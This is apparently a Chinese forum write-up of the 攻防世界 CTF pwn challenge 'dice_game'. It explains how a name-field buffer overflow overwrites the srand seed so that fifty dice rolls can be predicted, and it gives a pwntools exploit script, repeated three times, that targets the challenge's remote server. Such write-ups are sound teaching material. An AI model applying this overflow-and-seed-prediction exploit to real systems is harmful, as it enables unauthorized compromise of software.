-
-
[原创]攻防世界pwn高手进阶区dice_game
-
发表于: 2019-9-4 16:14
-
64位程序,堆栈保护没开
sub_A20()是对比我们的输入与程序产生的随机数是否想相等,相等则返回1,反之则返回0sub_B28()是读取flag文件,并输出
0x02 思路
sub_A20()是对比我们的输入与程序产生的随机数是否想相等,相等则返回1,反之则返回0
sub_B28()是读取flag文件,并输出
成功执行sub_B28()即可获得flag,也就需要连续输入正确50次,靠运气是不太可能了
但是rand()产生随机数其实是伪随机数,是根据上面srand(seed[0]);留下的种子而产生随机数,而seed[0]则是用来初始化种子的,所以我们可以通过覆盖掉seed[0]来实现预测rand()产生的随机数
在这里能够发现buf只要超过0x40就可以实现覆盖seed
0x03 构造exp
from pwn import * from ctypes import * context.arch = "amd64" #context.log_level = "debug" p = remote('111.198.29.45','56197') #p = process("./dice_game") libc = cdll.LoadLibrary("libc.so.6") payload = 'a'*0x40 + p64(0) #payload = 'a'*0x40 + p64(1) p.sendlineafter("Welcome, let me know your name: ",payload) for i in range(50): p.recvuntil("Give me the point(1~6): ") n = libc.rand(0)%6+1 #n = libc.rand(1)%6+1 p.sendline(str(n)) p.interactive()
from pwn import *
from ctypes import *
context.arch = "amd64"
#context.log_level = "debug"
p = remote('111.198.29.45','56197')
#p = process("./dice_game")
libc = cdll.LoadLibrary("libc.so.6")
payload = 'a'*0x40 + p64(0)
#payload = 'a'*0x40 + p64(1)
p.sendlineafter("Welcome, let me know your name: ",payload)
for i in range(50):
p.recvuntil("Give me the point(1~6): ")
n = libc.rand(0)%6+1
#n = libc.rand(1)%6+1
p.sendline(str(n))
p.interactive()
from pwn import *
from ctypes import *
context.arch = "amd64"
#context.log_level = "debug"
p = remote('111.198.29.45','56197')
#p = process("./dice_game")
libc = cdll.LoadLibrary("libc.so.6")
payload = 'a'*0x40 + p64(0)
#payload = 'a'*0x40 + p64(1)
p.sendlineafter("Welcome, let me know your name: ",payload)
for i in range(50):
p.recvuntil("Give me the point(1~6): ")
n = libc.rand(0)%6+1
#n = libc.rand(1)%6+1
p.sendline(str(n))
p.interactive()
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
